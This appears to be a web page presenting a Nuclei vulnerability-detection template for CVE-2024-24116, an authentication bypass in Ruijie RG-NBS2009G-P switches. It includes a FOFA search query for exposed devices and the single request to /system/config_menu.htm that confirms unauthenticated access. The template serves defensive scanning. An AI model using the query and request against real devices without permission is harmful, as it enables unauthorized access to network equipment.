Skip to content

Ruijie RG-NBS2009G-P - Improper Authentication

ID: CVE-2024-24116

Severity: critical

Author: friea

Tags: ruijie,cve,cve2024,exposure,bac

An issue in Ruijie RG-NBS2009G-P RGOS v.10.4(1)P2 Release(9736) allows a remote attacker to gain privileges via the system/config_menu.htm.

id: CVE-2024-24116
info:
name: Ruijie RG-NBS2009G-P - Improper Authentication
author: friea
severity: critical
description: |
An issue in Ruijie RG-NBS2009G-P RGOS v.10.4(1)P2 Release(9736) allows a remote attacker to gain privileges via the system/config_menu.htm.
reference:
- https://github.com/zty-1995/RG-NBS2009G-P-switch/tree/main/Unauthorized%20Access%20Vulnerability
- https://gist.github.com/zty-1995/7a5e3ad0eb3b6c44db1a6eb4092893d3
- https://nvd.nist.gov/vuln/detail/CVE-2024-24116
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-24116
cwe-id: CWE-287
epss-score: 0.00106
epss-percentile: 0.44559
cpe: cpe:2.3:o:ruijie:rg-nbs2009g-p_firmware:10.4\(1\)p2_release\(9736\):*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
fofa-query: body="ruijie.com.cn"
vendor: ruijie
product: rg-nbs2009g-p, rg-nbs2009g-p_firmware
tags: ruijie,cve,cve2024,exposure,bac
http:
- method: GET
path:
- "{{BaseURL}}/system/config_menu.htm"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "configManage.asp"
- "reinitIframe()"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502205997a68c6dcf006bc5f1acc1b2e362d974f44bde5336cc406a157621adc70453022100885d308c0f0fb8a6b43e6d70be4e31b4a073c387c371c64dd3e6a5589b5721de:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-24116.yaml"

View on Github